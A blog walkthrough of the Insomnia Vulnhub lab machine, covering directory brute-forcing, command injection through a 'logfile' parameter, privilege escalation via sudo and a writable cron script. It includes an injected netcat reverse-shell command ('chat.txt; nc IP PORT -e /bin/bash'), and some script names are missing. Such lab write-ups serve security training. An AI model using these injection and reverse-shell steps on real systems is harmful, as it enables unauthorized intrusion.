Insomnia Vulnhub Writeup (First blood)

Difficulty: Easy/Medium (In my opinion)


Nice port 8080 is open, so let’s browse

as we can see there is a chat, but we can’t do anything so, we use dirb to brute-force directories


Ok we found the directory “administration.php” and other but there are rabbit hole , let’s browse this directory

Nice “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameter


We found the parameter “logfile” so , we can do an LFI? mmmh No! Doesn’t work, but we can do command injection, and the result will appear directly in the chat!



Will appear some files! Nice , we notice that “chat.txt” can execute commands so


Wow! www-data so , let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash and listen first!


sudo -l

Nice that “” had user “julia” privilege, so add /bin/bash in that script



Initially we do not notice anything interesting but, if we try to see in / etc / crontab we notice a file running on the system and running, so we can exploit it.

For convenience it uses pspy64 which shows me the files that are running on the system. To understand how often it is performed.

Now put pspy64 on target shell in /tmp directory and give privilege “chmod +x pspy64 and run it ./pspy64

And run now!

as we can see every 1 minutes, we run the “” script so we also notice that it is an editable file! Then let’s add our payload for the reverse shell.

Just wait and listen on port 4444, and…..


Thank you everyone, i hope this is useful!





| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A magical day in Disney with Machine Learning — Part 2 Using APIs to get weather conditions and…

Setup Flutter with VS Code (mac)

DevOps and the Cloud

Grokking GROUP BY

Spring Security with DB-JWT-OAUTH

WSO2 API Manager: API Controller — API Provider Name is not mandatory anymore when exporting an API

How I Learned to Stop Worrying and Love the Bot

A Gentle Introduction to Using ROS on Your Robots

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

roottusk/vapi Writeup

HackTheBox - Pandora (Walkthrough)

NahamStore Write-up TryHackMe

eWPTXv2 Review